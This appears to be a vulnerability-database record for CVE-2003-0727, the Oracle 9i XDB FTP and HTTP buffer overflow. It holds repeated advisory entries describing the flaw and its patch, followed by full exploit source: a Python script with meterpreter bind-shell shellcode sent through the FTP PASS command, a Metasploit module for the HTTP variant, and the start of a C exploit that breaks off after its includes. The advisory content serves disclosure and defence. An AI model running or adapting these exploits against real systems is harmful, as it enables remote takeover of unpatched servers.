{"id": "SAINT:FEBDE6067ED68D17D37C8F54DDD884A4", "vendorId": null, "type": "saint", "bulletinFamily": "exploit", "title": "Oracle 9i Release 2 XDB FTP Pass Overflow", "description": "Added: 02/25/2009 \nCVE: [CVE-2003-0727](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727>) \nBID: [8375](<http://www.securityfocus.com/bid/8375>) \nOSVDB: [2449](<http://www.osvdb.org/2449>) \n\n\n### Background\n\nOracle 9i release 2 includes the XDB FTP service which by default listens on port 2100. \n\n### Problem\n\nA buffer overflow vulnerability in the parsing of credentials passed to the server allows remote attackers to execute arbitrary commands by sending a long username or password during authentication. \n\n### Resolution\n\nThe vulnerability is fixed in Oracle 9i version 9.2.0.4. To download and install the relevant patches follow the guide included in <http://www.oracle.com/technology/deploy/security/pdf/2003Alert58.pdf>. \n\n### References\n\n<http://otn.oracle.com/deploy/security/pdf/2003Alert58.pdf> \n<http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf> \n<http://www.appsecinc.com/resources/alerts/oracle/2003-0005.html> \n\n\n### Limitations\n\nExploit works against version 9.2.0.1 \n\n### Platforms\n\nWindows Server 2003 SP2 / Windows Server 2003 \nWindows Server 2003 SP1 \nWindows Server 2003 SP0,SP1,SP2 DEP-Disabled \nWindows 2000 \n \n\n", "published": "2009-02-25T00:00:00", "modified": "2009-02-25T00:00:00", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "userInteractionRequired": false}, "cvss3": {}, "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/oracle_xdb_ftp_pass_overflow", "reporter": "SAINT Corporation", "references": [], "cvelist": ["CVE-2003-0727"], "immutableFields": [], "lastseen": "2021-07-28T14:33:35", "viewCount": 6, "enchantments": {"dependencies": {}, "score": {"value": 7.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2006-008"]}, {"type": "cve", "idList": ["CVE-2003-0727"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FTP/ORACLE9I_XDB_FTP_PASS", "MSF:EXPLOIT/WINDOWS/FTP/ORACLE9I_XDB_FTP_UNLOCK", "MSF:EXPLOIT/WINDOWS/HTTP/ORACLE9I_XDB_PASS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144108"]}, {"type": "saint", "idList": ["SAINT:4ED30277F5B736B24E4141FC17DCC376", "SAINT:548601822EB48611F760016295035CD0"]}, {"type": "zdt", "idList": ["1337DAY-ID-28634"]}]}, "exploitation": null, "vulnersScore": 7.4}, "_state": {"dependencies": 1645297268}}

{"saint": [{"lastseen": "2016-10-03T15:02:00", "description": "Added: 02/25/2009 \nCVE: [CVE-2003-0727](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727>) \nBID: [8375](<http://www.securityfocus.com/bid/8375>) \nOSVDB: [2449](<http://www.osvdb.org/2449>) \n\n\n### Background\n\nOracle 9i release 2 includes the XDB HTTP service which by default listens on port 8080. \n\n### Problem\n\nA buffer overflow vulnerability in the parsing of credentials passed to the server allows remote attackers to execute arbitrary commands by sending a long username or password during HTTP Basic authentication. \n\n### Resolution\n\nThe vulnerability is fixed in Oracle 9i version 9.2.0.4. To download and install the relevant patches follow the guide included in <http://www.oracle.com/technology/deploy/security/pdf/2003Alert58.pdf>. \n\n### References\n\n<http://otn.oracle.com/deploy/security/pdf/2003Alert58.pdf> \n<http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf> \n<http://www.appsecinc.com/resources/alerts/oracle/2003-0005.html> \n\n\n### Limitations\n\nExploit works against version 9.2.0.1 \n\n### Platforms\n\nWindows Server 2003 SP2 / Windows Server 2003 \nWindows Server 2003 SP1 \nWindows Server 2003 SP0,SP1,SP2 DEP-Disabled \nWindows 2000 \n \n\n", "cvss3": {}, "published": "2009-02-25T00:00:00", "type": "saint", "title": "Oracle 9i Release 2 XDB HTTP Pass Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2003-0727"], "modified": "2009-02-25T00:00:00", "id": "SAINT:BA10869CDDBD71263650D776FBB201BA", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/oracle_xdb_http_pass_overflow", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-10-03T15:01:58", "description": "Added: 02/25/2009 \nCVE: [CVE-2003-0727](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727>) \nBID: [8375](<http://www.securityfocus.com/bid/8375>) \nOSVDB: [2449](<http://www.osvdb.org/2449>) \n\n\n### Background\n\nOracle 9i release 2 includes the XDB FTP service which by default listens on port 2100. \n\n### Problem\n\nA buffer overflow vulnerability in the parsing of credentials passed to the server allows remote attackers to execute arbitrary commands by sending a long username or password during authentication. \n\n### Resolution\n\nThe vulnerability is fixed in Oracle 9i version 9.2.0.4. To download and install the relevant patches follow the guide included in <http://www.oracle.com/technology/deploy/security/pdf/2003Alert58.pdf>. \n\n### References\n\n<http://otn.oracle.com/deploy/security/pdf/2003Alert58.pdf> \n<http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf> \n<http://www.appsecinc.com/resources/alerts/oracle/2003-0005.html> \n\n\n### Limitations\n\nExploit works against version 9.2.0.1 \n\n### Platforms\n\nWindows Server 2003 SP2 / Windows Server 2003 \nWindows Server 2003 SP1 \nWindows Server 2003 SP0,SP1,SP2 DEP-Disabled \nWindows 2000 \n \n\n", "cvss3": {}, "published": "2009-02-25T00:00:00", "type": "saint", "title": "Oracle 9i Release 2 XDB FTP Pass Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2003-0727"], "modified": "2009-02-25T00:00:00", "id": "SAINT:C6ADA78BEBD296FDFA33FCAD1C4138AC", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/oracle_xdb_ftp_pass_overflow", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2022-01-26T11:32:55", "description": "Added: 02/25/2009 \nCVE: [CVE-2003-0727](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727>) \nBID: [8375](<http://www.securityfocus.com/bid/8375>) \nOSVDB: [2449](<http://www.osvdb.org/2449>) \n\n\n### Background\n\nOracle 9i release 2 includes the XDB FTP service which by default listens on port 2100. \n\n### Problem\n\nA buffer overflow vulnerability in the parsing of credentials passed to the server allows remote attackers to execute arbitrary commands by sending a long username or password during authentication. \n\n### Resolution\n\nThe vulnerability is fixed in Oracle 9i version 9.2.0.4. To download and install the relevant patches follow the guide included in <http://www.oracle.com/technology/deploy/security/pdf/2003Alert58.pdf>. \n\n### References\n\n<http://otn.oracle.com/deploy/security/pdf/2003Alert58.pdf> \n<http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf> \n<http://www.appsecinc.com/resources/alerts/oracle/2003-0005.html> \n\n\n### Limitations\n\nExploit works against version 9.2.0.1 \n\n### Platforms\n\nWindows Server 2003 SP2 / Windows Server 2003 \nWindows Server 2003 SP1 \nWindows Server 2003 SP0,SP1,SP2 DEP-Disabled \nWindows 2000 \n \n\n", "cvss3": {}, "published": "2009-02-25T00:00:00", "type": "saint", "title": "Oracle 9i Release 2 XDB FTP Pass Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0727"], "modified": "2009-02-25T00:00:00", "id": "SAINT:C92EC71290FFC687B136AB1A68793851", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/oracle_xdb_ftp_pass_overflow", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-07-29T16:40:36", "description": "Added: 02/25/2009 \nCVE: [CVE-2003-0727](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727>) \nBID: [8375](<http://www.securityfocus.com/bid/8375>) \nOSVDB: [2449](<http://www.osvdb.org/2449>) \n\n\n### Background\n\nOracle 9i release 2 includes the XDB HTTP service which by default listens on port 8080. \n\n### Problem\n\nA buffer overflow vulnerability in the parsing of credentials passed to the server allows remote attackers to execute arbitrary commands by sending a long username or password during HTTP Basic authentication. \n\n### Resolution\n\nThe vulnerability is fixed in Oracle 9i version 9.2.0.4. To download and install the relevant patches follow the guide included in <http://www.oracle.com/technology/deploy/security/pdf/2003Alert58.pdf>. \n\n### References\n\n<http://otn.oracle.com/deploy/security/pdf/2003Alert58.pdf> \n<http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf> \n<http://www.appsecinc.com/resources/alerts/oracle/2003-0005.html> \n\n\n### Limitations\n\nExploit works against version 9.2.0.1 \n\n### Platforms\n\nWindows Server 2003 SP2 / Windows Server 2003 \nWindows Server 2003 SP1 \nWindows Server 2003 SP0,SP1,SP2 DEP-Disabled \nWindows 2000 \n \n\n", "cvss3": {}, "published": "2009-02-25T00:00:00", "type": "saint", "title": "Oracle 9i Release 2 XDB HTTP Pass Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0727"], "modified": "2009-02-25T00:00:00", "id": "SAINT:56366612FCFF29875ACDF59C60B5205D", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/oracle_xdb_http_pass_overflow", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-07-29T16:40:15", "description": "Added: 02/25/2009 \nCVE: [CVE-2003-0727](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727>) \nBID: [8375](<http://www.securityfocus.com/bid/8375>) \nOSVDB: [2449](<http://www.osvdb.org/2449>) \n\n\n### Background\n\nOracle 9i release 2 includes the XDB FTP service which by default listens on port 2100. \n\n### Problem\n\nA buffer overflow vulnerability in the parsing of credentials passed to the server allows remote attackers to execute arbitrary commands by sending a long username or password during authentication. \n\n### Resolution\n\nThe vulnerability is fixed in Oracle 9i version 9.2.0.4. To download and install the relevant patches follow the guide included in <http://www.oracle.com/technology/deploy/security/pdf/2003Alert58.pdf>. \n\n### References\n\n<http://otn.oracle.com/deploy/security/pdf/2003Alert58.pdf> \n<http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf> \n<http://www.appsecinc.com/resources/alerts/oracle/2003-0005.html> \n\n\n### Limitations\n\nExploit works against version 9.2.0.1 \n\n### Platforms\n\nWindows Server 2003 SP2 / Windows Server 2003 \nWindows Server 2003 SP1 \nWindows Server 2003 SP0,SP1,SP2 DEP-Disabled \nWindows 2000 \n \n\n", "cvss3": {}, "published": "2009-02-25T00:00:00", "type": "saint", "title": "Oracle 9i Release 2 XDB FTP Pass Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0727"], "modified": "2009-02-25T00:00:00", "id": "SAINT:4ED30277F5B736B24E4141FC17DCC376", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/oracle_xdb_ftp_pass_overflow", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-07-28T14:33:20", "description": "Added: 02/25/2009 \nCVE: [CVE-2003-0727](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727>) \nBID: [8375](<http://www.securityfocus.com/bid/8375>) \nOSVDB: [2449](<http://www.osvdb.org/2449>) \n\n\n### Background\n\nOracle 9i release 2 includes the XDB HTTP service which by default listens on port 8080. \n\n### Problem\n\nA buffer overflow vulnerability in the parsing of credentials passed to the server allows remote attackers to execute arbitrary commands by sending a long username or password during HTTP Basic authentication. \n\n### Resolution\n\nThe vulnerability is fixed in Oracle 9i version 9.2.0.4. To download and install the relevant patches follow the guide included in <http://www.oracle.com/technology/deploy/security/pdf/2003Alert58.pdf>. \n\n### References\n\n<http://otn.oracle.com/deploy/security/pdf/2003Alert58.pdf> \n<http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf> \n<http://www.appsecinc.com/resources/alerts/oracle/2003-0005.html> \n\n\n### Limitations\n\nExploit works against version 9.2.0.1 \n\n### Platforms\n\nWindows Server 2003 SP2 / Windows Server 2003 \nWindows Server 2003 SP1 \nWindows Server 2003 SP0,SP1,SP2 DEP-Disabled \nWindows 2000 \n \n\n", "cvss3": {}, "published": "2009-02-25T00:00:00", "type": "saint", "title": "Oracle 9i Release 2 XDB HTTP Pass Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0727"], "modified": "2009-02-25T00:00:00", "id": "SAINT:DD0DB96DDBDB643161575C84D45AFA81", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/oracle_xdb_http_pass_overflow", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-01-26T11:32:55", "description": "Added: 02/25/2009 \nCVE: [CVE-2003-0727](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727>) \nBID: [8375](<http://www.securityfocus.com/bid/8375>) \nOSVDB: [2449](<http://www.osvdb.org/2449>) \n\n\n### Background\n\nOracle 9i release 2 includes the XDB HTTP service which by default listens on port 8080. \n\n### Problem\n\nA buffer overflow vulnerability in the parsing of credentials passed to the server allows remote attackers to execute arbitrary commands by sending a long username or password during HTTP Basic authentication. \n\n### Resolution\n\nThe vulnerability is fixed in Oracle 9i version 9.2.0.4. To download and install the relevant patches follow the guide included in <http://www.oracle.com/technology/deploy/security/pdf/2003Alert58.pdf>. \n\n### References\n\n<http://otn.oracle.com/deploy/security/pdf/2003Alert58.pdf> \n<http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf> \n<http://www.appsecinc.com/resources/alerts/oracle/2003-0005.html> \n\n\n### Limitations\n\nExploit works against version 9.2.0.1 \n\n### Platforms\n\nWindows Server 2003 SP2 / Windows Server 2003 \nWindows Server 2003 SP1 \nWindows Server 2003 SP0,SP1,SP2 DEP-Disabled \nWindows 2000 \n \n\n", "cvss3": {}, "published": "2009-02-25T00:00:00", "type": "saint", "title": "Oracle 9i Release 2 XDB HTTP Pass Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0727"], "modified": "2009-02-25T00:00:00", "id": "SAINT:548601822EB48611F760016295035CD0", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/oracle_xdb_http_pass_overflow", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-10T00:00:00", "description": "", "cvss3": {}, "published": "2006-02-12T00:00:00", "type": "checkpoint_advisories", "title": "Oracle Database Server XML Database Buffer Overflow (CVE-2003-0727)", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0727"], "modified": "2006-02-12T00:00:00", "id": "CPAI-2006-008", "href": "", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Oracle 9i XML database suffers from a buffer overflow vulnerability. By passing an overly long username or password, an attacker can execute arbitrary code on the target system.", "cvss3": {}, "published": "2006-02-12T00:00:00", "type": "checkpoint_advisories", "title": "Update Protection against Oracle XDB HTTP Buffer Overflow Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0727"], "modified": "2007-05-08T00:00:00", "id": "CPAI-2006-013", "href": "", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:51", "description": "", "cvss3": {}, "published": "2016-02-03T00:00:00", "type": "packetstorm", "title": "Oracle 9i XDB FTP Pass Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2003-0727"], "modified": "2016-02-03T00:00:00", "id": "PACKETSTORM:135572", "href": "https://packetstormsecurity.com/files/135572/Oracle-9i-XDB-FTP-Pass-Overflow.html", "sourceData": "`''' \nOracle 9i XDB FTP PASS Overflow (win32) \nPorted to python from the Metasploit oracle9i_xdb_ftp_pass.rb exploit \nOriginal exploit: \nhttps://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb \n \nDescription from original exploit: \nBy passing an overly long string to the PASS command, a \nstack based buffer overflow occurs. David Litchfield, has \nillustrated multiple vulnerabilities in the Oracle 9i XML \nDatabase (XDB), during a seminar on \"Variations in exploit \nmethods between Linux and Windows\" presented at the Blackhat \nconference. \nhttp://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf \n \nCVE: 2003-0727 \nOSVDB: 2449 \nBID: 8375 \n \nDate: 2/2/2016 \nPorted by: Tom Ryans \nTested on: Win 2000 SP4 \n \nUsage: oracle9i_ftp_pass.py target_ip target_port \nex. oracle9i_ftp_pass.py 127.0.0.1 2100 \n \nSpawns meterpreter bind shell on port 7000. \n''' \n \n#!/usr/bin/python \n \nimport sys, socket \n \nif len(sys.argv) != 3: \nprint \"Usage: %s target_ip target_port\" % sys.argv[0] \nsys.exit() \n \nhost = str(sys.argv[1]) \nport = int(sys.argv[2]) \n \n#msfvenom -p windows/meterpreter/bind_tcp lport=7000 EXITFUNC=thread -b \"\\x00\\x09\\x0a\\x0d\\x20\\x22\\x25\\x26\\x27\\x2b\\x2f\\x3a\\x3c\\x3e\\x3f\\x40\" -f c \nshellcode = ( \n\"\\xdb\\xc8\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x4b\\xbd\\xe8\\xe3\\x74\" \n\"\\x4e\\x83\\xc3\\x04\\x31\\x6b\\x16\\x03\\x6b\\x16\\xe2\\x1d\\x1f\\x9c\\xcc\" \n\"\\xdd\\xe0\\x5d\\xb1\\x54\\x05\\x6c\\xf1\\x02\\x4d\\xdf\\xc1\\x41\\x03\\xec\" \n\"\\xaa\\x07\\xb0\\x67\\xde\\x8f\\xb7\\xc0\\x55\\xe9\\xf6\\xd1\\xc6\\xc9\\x99\" \n\"\\x51\\x15\\x1d\\x7a\\x6b\\xd6\\x50\\x7b\\xac\\x0b\\x98\\x29\\x65\\x47\\x0e\" \n\"\\xde\\x02\\x1d\\x92\\x55\\x58\\xb3\\x92\\x8a\\x29\\xb2\\xb3\\x1c\\x21\\xed\" \n\"\\x13\\x9e\\xe6\\x85\\x1a\\xb8\\xeb\\xa0\\xd5\\x33\\xdf\\x5f\\xe4\\x95\\x11\" \n\"\\x9f\\x4a\\xd8\\x9d\\x52\\x93\\x1c\\x19\\x8d\\xe6\\x54\\x59\\x30\\xf0\\xa2\" \n\"\\x23\\xee\\x75\\x31\\x83\\x65\\x2d\\x9d\\x35\\xa9\\xab\\x56\\x39\\x06\\xb8\" \n\"\\x31\\x5e\\x99\\x6d\\x4a\\x5a\\x12\\x90\\x9d\\xea\\x60\\xb6\\x39\\xb6\\x33\" \n\"\\xd7\\x18\\x12\\x95\\xe8\\x7b\\xfd\\x4a\\x4c\\xf7\\x10\\x9e\\xfd\\x5a\\x7d\" \n\"\\x53\\xcf\\x64\\x7d\\xfb\\x58\\x16\\x4f\\xa4\\xf2\\xb0\\xe3\\x2d\\xdc\\x47\" \n\"\\x03\\x04\\x98\\xd8\\xfa\\xa7\\xd8\\xf1\\x38\\xf3\\x88\\x69\\xe8\\x7c\\x43\" \n\"\\x6a\\x15\\xa9\\xf9\\x61\\xb0\\x02\\x1f\\x88\\x28\\xa2\\xb5\\x71\\xc5\\x4e\" \n\"\\x46\\xa9\\xf5\\x70\\x8d\\xc2\\x9e\\x8c\\x2d\\xf6\\x06\\x18\\xcb\\x62\\xa7\" \n\"\\x4c\\x44\\x1b\\x05\\xab\\x5d\\xbc\\x76\\x99\\x24\\x82\\xfc\\x7a\\x71\\x6b\" \n\"\\x48\\x93\\x45\\x94\\x49\\xb1\\xe2\\x02\\xc2\\xd6\\x37\\x32\\xd5\\xf2\\x10\" \n\"\\x23\\x42\\x88\\xf0\\x06\\xf2\\x8d\\xd9\\xf3\\xf4\\x1b\\xe5\\x55\\xa2\\xb3\" \n\"\\xe7\\x80\\x84\\x1b\\x18\\xe7\\x96\\x5c\\xe6\\x76\\xb4\\x17\\xd0\\xec\\x86\" \n\"\\x4f\\x1c\\xe1\\x06\\x90\\x4a\\x6b\\x07\\xf8\\x2a\\xcf\\x54\\x1d\\x35\\xda\" \n\"\\xc8\\x8e\\xa3\\xe5\\xb8\\x63\\x64\\x8e\\x46\\x5d\\x42\\x11\\xb8\\x88\\xd1\" \n\"\\x56\\x46\\x4d\\xd2\\xa7\\x84\\x98\\x1a\\xd2\\xe3\\x18\") \n \n \nuser = \"A\" * 10 \n# return address from Metasploit module: 0x60616d46 oraclient9.dll (pop/pop/ret) \nret = \"\\x46\\x6d\\x61\\x60\" \nprependencoder = \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\" #from Metasploit module \nnops = \"\\x90\" * (800 - len(shellcode) - len(prependencoder)) \n \nbuff = \"A\" * 442 + \"\\xeb\\x06\\x90\\x90\" + ret + nops + prependencoder + shellcode \nprint \" ++++++++++++++++++++++++++++++++++++++++++++\" \nprint \" + Oracle 9i XDB FTP PASS Overflow exploit +\" \nprint \" +++++++++++++++++++++++++++++++++++++++++++++\" \ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM) \ns.connect((host,port)) \nprint s.recv(1024) \nprint \"Sending %s size payload...\" % len(buff) \ns.send(\"USER \" + user + \"\\r\\n\") \ns.send(\"PASS \" + buff + \"\\r\\n\") \nprint \"Payload sent....\" \nprint \"Check port 7000 for meterpreter shell...\" \ns.close() \n \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/135572/oracle9i_ftp_pass.py.txt", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:14:27", "description": "", "cvss3": {}, "published": "2009-10-30T00:00:00", "type": "packetstorm", "title": "Oracle 9i XDB HTTP PASS Overflow (win32)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2003-0727"], "modified": "2009-10-30T00:00:00", "id": "PACKETSTORM:82937", "href": "https://packetstormsecurity.com/files/82937/Oracle-9i-XDB-HTTP-PASS-Overflow-win32.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Oracle 9i XDB HTTP PASS Overflow (win32)', \n'Description' => %q{ \nThis module exploits a stack overflow in the authorization \ncode of the Oracle 9i HTTP XDB service. David Litchfield, \nhas illustrated multiple vulnerabilities in the Oracle \n9i XML Database (XDB), during a seminar on \"Variations \nin exploit methods between Linux and Windows\" presented \nat the Blackhat conference. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2003-0727'], \n['OSVDB', '2449'], \n['BID', '8375'], \n['URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 400, \n'BadChars' => \"\\x00\", \n'PrependEncoder' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Oracle 9.2.0.1 Universal', { 'Ret' => 0x60616d46 } ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Aug 18 2003')) \n \nregister_options( [ Opt::RPORT(8080) ], self.class ) \n \nend \n \ndef check \nconnect \nsock.put(\"GET / HTTP/1.0\\r\\n\\r\\n\") \nresp = sock.get_once \ndisconnect \n \nif (resp =~ /9.2.0.1.0/) \nreturn Exploit::CheckCode::Vulnerable \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nconnect \n \nsploit = rand_text_english(4, payload_badchars) + \":\" \nsploit << rand_text_english(442, payload_badchars) \nsploit << \"\\xeb\\x64\" + make_nops(2) + [target.ret].pack('V') \nsploit << make_nops(266) + \"\\xeb\\x10\" + make_nops(109) + payload.encoded \n \nreq = \"Authorization: Basic #{Rex::Text.encode_base64(sploit)}\\r\\n\\r\\n\" \n \nres = \"GET / HTTP/1.1\\r\\n\" + \"Host: #{rhost}:#{rport}\\r\\n\" + req \n \nprint_status(\"Trying target %s...\" % target.name) \n \nsock.put(res) \n \nhandler \ndisconnect \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/82937/oracle9i_xdb_pass.rb.txt", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-14T03:45:10", "description": "", "cvss3": {}, "published": "2017-08-12T00:00:00", "type": "packetstorm", "title": "Oracle XDB FTP Service UNLOCK Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2003-0727"], "modified": "2017-08-12T00:00:00", "id": "PACKETSTORM:144108", "href": "https://packetstormsecurity.com/files/144108/Oracle-XDB-FTP-Service-UNLOCK-Buffer-Overflow.html", "sourceData": "`/* Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit */ \n/* David Litchfield from ngssoftware (at Blackhat 2003)*/ \n/* */ \n/* Original Advisory : */ \n/* http://www.blackhat.com/presentations/bh-usa-03/bh- */ \n/* us-03-litchfield-paper.pdf */ \n \n \n#include <stdio.h> \n#include <windows.h> 